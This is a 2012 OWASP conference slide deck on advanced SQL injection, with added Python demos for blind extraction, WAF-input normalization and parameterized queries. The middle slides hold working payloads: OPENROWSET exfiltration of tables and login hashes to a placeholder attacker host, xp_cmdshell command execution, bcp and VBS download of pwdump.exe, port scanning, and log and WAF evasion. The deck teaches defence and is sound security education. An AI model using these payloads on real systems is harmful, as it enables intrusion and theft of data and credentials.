Owasp Indy Q2 2012 Advanced SQLi

1. Advanced SQLi and Evasion Techniques
2. About Me / Introduction
   Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP
   dprofancik@gmail.com
   @integrisec
3. Credit
   • Cesar Cerrudo – CTO, IOActive Labs
     o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
   • ModSecurity Team – Trustwave SpiderLabs
     o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
   • Avi Douglen – OWASP Board Member, Israel
     o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
4. SQL Injection Basics
   • Dynamic construction of SQL queries
       "SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
   • Unsanitized user input
       uname = ' or 1=1--
       => SELECT * FROM table WHERE user = '' or 1=1-- AND pwd = ''
     (the -- comments out the rest of the statement, so the password check never runs and the OR makes every row match)
   • Excessive permission
     o Web services running as a privileged user with db_owner rights
     o Connecting to the database using sa, dbo, or sysadmin accounts
     o Lax file system permissions
5. Advanced SQLi Techniques
   • Blind SQL Injection
   • Data Exfiltration
   • Privilege Escalation
   • Command Execution
   • Uploading Files
   • Internal DB Server Exploration
   • Port Scanning
   • Firewall Evasion
   • Log Evasion
   • WAF Evasion
6. Blind SQL Injection
7. Blind SQL Injection
   • Differential Analysis: the application returns no error text or query output, so compare the page for a known-true and a known-false condition
     Example:
       http://www.someforum.com/posts.php?id=2
         SELECT author, title, body FROM posts WHERE ID = 2
       http://www.someforum.com/posts.php?id=2 and 1=2
         SELECT author, title, body FROM posts WHERE ID = 2 and 1=2    (post disappears)
       http://www.someforum.com/posts.php?id=2 and 1=1
         SELECT author, title, body FROM posts WHERE ID = 2 and 1=1    (post still rendered)
     Any condition can now be substituted for 1=1 and answered one bit at a time.
8. Blind SQL Injection (cont.)
   • Database Management System Fingerprinting
     o System Functions
       • MS SQL Server = getdate()
       • MySQL = now()
       • Oracle = sysdate (no parentheses; MySQL also accepts sysdate(), so probe more than one function)
       • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
     o String Concatenation
       • MS SQL Server = +
       • MySQL = CONCAT() (in MySQL + is numeric addition, so 'te'+'st' evaluates to 0; || is concatenation only with sql_mode PIPES_AS_CONCAT)
       • Oracle = ||, CONCAT()
       • Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
         (true on SQL Server, false on MySQL and Oracle; 'test'='te'||'st' is true on Oracle)
     o Query Chaining (stacked queries)
       • MS SQL Server = allows chaining with semicolon
       • MySQL = the server supports it, but whether it works through the web application depends on the client library (many send one statement per call)
       • Oracle = does NOT allow chaining with semicolon
       • Example: http://www.someforum.com/posts.php?id=2; commit --
9. Blind SQL Injection (cont.)
   • Timing Attacks: when the page looks the same either way, make the true branch slow and measure the response time
     o Adding delay
       • SQL Server = WAITFOR DELAY '0:0:10'
       • MySQL = BENCHMARK(10000000, ENCODE('MSG', 'by 10 seconds')) (CPU-bound, so the delay varies with server load; MySQL 5.0.12 and later also have SLEEP(10))
       • PostgreSQL = pg_sleep(10)
       • Oracle = UNION with a query that returns a lot of results (DBMS_LOCK.SLEEP only if the account may execute DBMS_LOCK)
     o SELECT IF(condition, true, false) (MySQL syntax)
     Example:
       …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50), BENCHMARK(10000000, ENCODE('MSG', 'by 10 seconds')), null) FROM users WHERE userid = 1;
       (CHAR(50) is '2': the response is slow only when the first character of the password is '2')
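The differential-analysis and character-extraction steps of slides 7 to 9, as an added example that is not part of the original deck. A SQLite in-memory database with a constructed posts/users table stands in for the forum's backend, `page_has_post` plays the vulnerable posts.php, and the attacker side only ever learns whether a post was rendered. SQLite's `unicode()` and `substr()` are used in place of MySQL's `ASCII()` and `SUBSTRING()`; the table and column names are made up for the example.

```python
import sqlite3

# Constructed in-memory stand-in for the forum database; not the page's data.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE posts (id INTEGER, author TEXT, title TEXT, body TEXT);
    INSERT INTO posts VALUES (2, 'alice', 'Hello', 'first post');
    CREATE TABLE users (userid INTEGER, password TEXT);
    INSERT INTO users VALUES (1, 's3cret');
""")


def page_has_post(id_param: str) -> bool:
    """Simulated vulnerable posts.php?id=: the parameter is concatenated into
    the query, and the only feedback is whether a post was rendered."""
    sql = "SELECT author, title, body FROM posts WHERE id = " + id_param
    try:
        return DB.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a syntax error looks like "no post" from the outside


def oracle(condition: str) -> bool:
    """Differential analysis: tack a condition onto a known-good id and
    compare with the baseline page (id=2 and 1=1 vs. id=2 and 1=2)."""
    return page_has_post("2 AND (" + condition + ")")


def fingerprint() -> str:
    """The string-concatenation probe from slide 8, run through the oracle."""
    if oracle("'test' = 'te' || 'st'"):
        return "|| concatenation (Oracle / PostgreSQL / SQLite)"
    if oracle("'test' = 'te' + 'st'"):
        return "+ concatenation (MS SQL Server)"
    return "unknown"


def extract(subquery: str, max_len: int = 32) -> str:
    """Pull a string out one character at a time. Each character is found by
    binary search on its code point (7 requests per character instead of up
    to 95 guesses). SQLite's unicode()/substr() stand in for MySQL's
    ASCII()/SUBSTRING(); the technique is the same."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"
            if oracle(probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: unicode('') is NULL
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(fingerprint())
    print(extract("SELECT password FROM users WHERE userid = 1"))
```

A timing-based version replaces the boolean page comparison in `oracle` with a response-time measurement; the search loop in `extract` is unchanged.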
10. Attacking MS SQL Server
11. Linked and Remote Servers
   • OPENROWSET: an ad hoc connection from the victim's SQL Server to any reachable SQL Server, credentials supplied inline
     Example:
       SELECT * FROM OPENROWSET('SQLOLEDB',
         'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
         'SELECT * FROM table')
   • OPENDATASOURCE
     Example:
       SELECT * FROM OPENDATASOURCE('SQLOLEDB',
         'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;').DatabaseName.dbo.TableName
   (Both need ad hoc distributed queries to be allowed on the victim server.)
12. Data Exfiltration
   • Remote server INSERT: the victim connects out to the attacker's SQL Server and writes the query results into a table there (the destination table must already exist with matching columns)
     Example:
       INSERT INTO OPENROWSET('SQLOLEDB',
         'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
         'SELECT * FROM table1')
       SELECT * FROM table2
13. Data Exfiltration (cont.)
   Enumerate databases, then objects, then columns (the _sys* tables are pre-created on the attacker's server):
     INSERT INTO OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
       'SELECT * FROM _sysdatabases')
     SELECT * FROM master.dbo.sysdatabases

     INSERT INTO OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
       'SELECT * FROM _sysobjects')
     SELECT * FROM databasename.dbo.sysobjects

     INSERT INTO OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
       'SELECT * FROM _syscolumns')
     SELECT * FROM databasename.dbo.syscolumns
14. Data Exfiltration (cont.)
   Then the application tables and, on SQL Server 2000, the login hashes:
     INSERT INTO OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
       'SELECT * FROM table1')
     SELECT * FROM databasename..table1

     INSERT INTO OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
       'SELECT * FROM table2')
     SELECT * FROM databasename..table2

     INSERT INTO OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
       'SELECT * FROM _sysxlogins')
     SELECT * FROM master.dbo.sysxlogins
     (sysxlogins lives in master; it holds the password hashes on SQL Server 2000)
15. Privilege Escalation
   • Known vulnerabilities
     Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
       Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
   • Often not required
     o Connection strings using sa, dbo, sysadmin
     o Web service context
16. Command Execution
   Example (the command output is captured into a table on the attacker's server):
     INSERT INTO OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
       'SELECT * FROM temp_table')
     EXEC master.dbo.xp_cmdshell 'dir'
   (xp_cmdshell is off by default from SQL Server 2005 on, but a sysadmin login can turn it back on with sp_configure)
17. Uploading Files
   On attacker's server…
     1. CREATE TABLE AttackerTable (data text)
     2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
   On victim's server…
     3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
     4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo', 'AttackersAlias', 'REG_SZ', 'DBMSSOCN,AttackersIP,80'
        (registers a client alias so bcp reaches the attacker on port 80 when outbound 1433 is blocked)
     5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
18. Uploading Files (cont.)
   Alternatively, write a download script to disk one line at a time through the shell, then run it:
     INSERT INTO OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
       'SELECT * FROM temp_table')
     EXEC xp_cmdshell 'echo first script line >> script.vbs'
     …
     EXEC xp_cmdshell 'echo second script line >> script.vbs'
     …
     EXEC xp_cmdshell 'echo last script line >> script.vbs'
     EXEC xp_cmdshell 'script.vbs'    ==> execute script to download binary
19. Internal DB Server Exploration
   • Linked and Remote Servers: walk the linked-server graph outward from the compromised host
     1. INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM _sysservers')
        SELECT * FROM master.dbo.sysservers
     2. INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM _sysservers')
        SELECT * FROM linkedserver1.master.dbo.sysservers
     3. INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM _sysdatabases')
        SELECT * FROM linkedserver1.master.dbo.sysdatabases
     4. Rinse and repeat…
20. Port Scanning
   Example (point OPENROWSET at an arbitrary host and port with a short timeout; the error text and how long it takes to come back tell you whether the port is open):
     SELECT * FROM OPENROWSET('SQLOLEDB',
       'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
       'SELECT * FROM table')
21. Evasion Techniques
22. Firewall Evasion
   • Use port 80 for outbound (egress filters rarely block it; run the attacker's SQL Server listener on 80)
     Example:
       INSERT INTO OPENROWSET('SQLOLEDB',
         'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
         'SELECT * FROM table1')
       SELECT * FROM table2
23. Log Evasion
   • Inject using POST parameters (web server logs normally record only the query string)
   • Long HTTP requests
     o IIS truncates logged requests longer than 4097 characters
     o Sun-One Application Server truncates at 4092 characters
     Example (the padding pushes the injected id parameter past the point where the log entry is cut off, while the application still parses the whole request):
       http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
24. WAF Evasion
   • Comments
     o # = single line comment (MySQL)
     o -- = single line comment
     o /* */ = inline, multi-line comment
     o /*! */ = MySQL-specific inline comment; MySQL executes its contents, other parsers treat it as a comment
     Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
     (whether a comment may split a keyword depends on the DBMS and version; a comment in place of whitespace, UNION/**/SELECT, is the portable form)
   • New line
     o %0D%0A = URL-encoded CR LF
     o %0B = URL-encoded vertical tab
     Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
25. WAF Evasion (cont.)
   • Character Encoding
     o Unicode (U+02BC = ʼ; see the SQL Smuggling paper credited above)
     o CHAR()
     o Hexadecimal
     o URL-encoding
     o Double Encoding (the WAF decodes once and sees no comment characters; the application or a later decoder removes the remaining layer)
     Example (Double Encoding):
       URL    = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
       WAF    = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…
       Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
26. WAF Evasion (cont.)
   • Concatenation
     o EXEC()
     o Split/Join (HTTP parameter pollution: ASP/ASP.NET join repeated parameters with a comma)
     o Special Characters (e.g. '*', '+', '%', etc.)
     Example (Split/Join):
       URL         = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
       WAF         = id=SELECT name   id=password FROM users    (inspected as two harmless fragments)
       ASP/ASP.Net = id=SELECT name,password FROM users
     Example (Special Characters):
       URL         = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
       WAF         = id=SEL%ECT name,password FR%OM users
       ASP/ASP.Net = id=SELECT name,password FROM users    (a % that does not start a valid escape is dropped)
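Slides 23 to 26 all turn on the same defensive point: an inspector has to see the request the way the application will see it. The following is an added example, not code from the deck or from any WAF product, showing the normalization steps a detector needs before signature matching (full URL decoding for double encoding, comment stripping, whitespace folding, and ASP-style joining of repeated parameters), run over constructed requests modelled on the slides' examples. It also shows the slide 23 log-truncation problem: a logger that cuts the line at 4097 characters never records the payload even though the application parses it. The signature regex is deliberately tiny and the 4097 limit is taken from the slide, not measured.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample requests modelled on slides 24 to 26; not captured traffic.
SAMPLE_URLS = [
    "http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM users",
    "http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM users",
    "http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM users",
    "http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users",
]
# Log-evasion request from slide 23: padding in front of the injected parameter.
PADDED_URL = "http://www.someforum.com/posts.php?param=" + "a" * 4097 + "&id=2 or 1=1--"

# Deliberately small signature set; the point is what happens before matching.
SQLI_SIGNATURE = re.compile(
    r"\bUNION\s+SELECT\b|\bSELECT\b.+\bFROM\b|\bOR\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)


def full_decode(value: str, max_rounds: int = 3) -> str:
    """Keep URL-decoding until nothing changes, so %252f (double encoded) ends up as /."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize(value: str) -> str:
    """Undo the comment and whitespace tricks a WAF signature would trip over."""
    value = full_decode(value)
    value = re.sub(r"/\*!\d*(.*?)\*/", r"\1", value, flags=re.S)  # MySQL runs /*! ... */, so keep the inside
    value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)          # ordinary /**/ is whitespace at best
    value = re.sub(r"[ \t\r\n\x0b\x0c]+", " ", value)            # CR LF and vertical tab -> space
    return value.strip()


def parameters(url: str) -> dict:
    """Join repeated names with a comma, as ASP/ASP.NET do, so split/join
    payloads are inspected the way the application will see them."""
    joined = {}
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        joined[name] = raw if name not in joined else joined[name] + "," + raw
    return joined


def is_sqli(url: str) -> bool:
    """Inspect every normalized parameter value of the full request."""
    return any(SQLI_SIGNATURE.search(normalize(v)) for v in parameters(url).values())


def logged_line(url: str, limit: int = 4097) -> str:
    """What a logger that truncates long requests keeps (slide 23 cites 4097 for IIS)."""
    return url[:limit]


if __name__ == "__main__":
    for url in SAMPLE_URLS + [PADDED_URL]:
        print(is_sqli(url), {k: normalize(v) for k, v in parameters(url).items()})
    print("payload survives in the log:", "1=1" in logged_line(PADDED_URL))
```

The order matters: decode before stripping comments (otherwise `%2f%2a` never becomes `/*`), and join repeated parameters before matching (otherwise each fragment is harmless on its own). A detector that works from the truncated log line instead of the live request misses the padded case entirely.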
27. SQL Injection Prevention
28. SQLi Prevention
   • Sanitize User Input (defence in depth, not a substitute for parameterized queries)
     o Normalize Input (decode fully before validating, or the double-encoding case above gets through)
     o Whitelists
     o Built-in Functions
     o Regular Expressions
     o Trust NO data source (e.g. Cookies, Referer, User-Agent, etc.)
   • Prepared Statements/Parameterized Queries (the primary fix: user data is never part of the SQL text)
   • Stored Procedures (only if they do not build dynamic SQL with EXEC internally)
   • Accounts with Least Privilege
   • Enable the DisallowAdhocAccess registry setting for MS SQL Server (on SQL Server 2005 and later keep the 'Ad Hoc Distributed Queries' sp_configure option disabled, which blocks OPENROWSET/OPENDATASOURCE; leave xp_cmdshell disabled)
   • Perform Self Assessments
   • Use a Web Application Firewall
   • Filter Outbound Traffic at Firewall (stops the OPENROWSET exfiltration and bcp download paths above)
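The string-built login from slide 4 next to the parameterized and whitelisted forms recommended here, as an added example that is not part of the original deck. SQLite in memory with a constructed users/posts table stands in for the application database; the column names and the `' or 1=1--` payload are the ones from slide 4, and the `posts.php?id=` whitelist is a made-up rule for the example.

```python
import re
import sqlite3

# Constructed in-memory tables; not the page's data.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE users (user TEXT, pwd TEXT);
    INSERT INTO users VALUES ('admin', 'correct horse');
    CREATE TABLE posts (id INTEGER, title TEXT);
    INSERT INTO posts VALUES (2, 'Hello');
""")


def login_vulnerable(uname: str, pword: str) -> bool:
    """The string-built query from slide 4. uname = ' or 1=1-- turns it into
    SELECT * FROM users WHERE user = '' or 1=1-- AND pwd = '...'
    and the comment removes the password check."""
    sql = ("SELECT * FROM users WHERE user = '" + uname +
           "' AND pwd = '" + pword + "'")
    return DB.execute(sql).fetchone() is not None


def login_parameterized(uname: str, pword: str) -> bool:
    """Placeholders: the driver passes the values separately from the SQL
    text, so the same payload is compared as a literal username and fails."""
    sql = "SELECT * FROM users WHERE user = ? AND pwd = ?"
    return DB.execute(sql, (uname, pword)).fetchone() is not None


POST_ID = re.compile(r"[1-9][0-9]{0,8}")  # whitelist: a plain positive integer


def post_title(id_param: str):
    """Whitelist validation for posts.php?id=: reject anything that is not a
    bare integer, and still bind the value rather than pasting it in."""
    if not POST_ID.fullmatch(id_param):
        raise ValueError("rejected id parameter: %r" % id_param)
    row = DB.execute("SELECT title FROM posts WHERE id = ?", (int(id_param),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "' or 1=1--"
    print("vulnerable:    ", login_vulnerable(payload, "wrong"))      # True
    print("parameterized: ", login_parameterized(payload, "wrong"))  # False
    print(post_title("2"))                                           # Hello
```

Note that `post_title` does both things the slide lists: the whitelist rejects `2 or 1=1--` and `2; commit --` before any SQL is built, and the surviving value still goes through a placeholder, so the two controls fail independently.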
29. Q&A
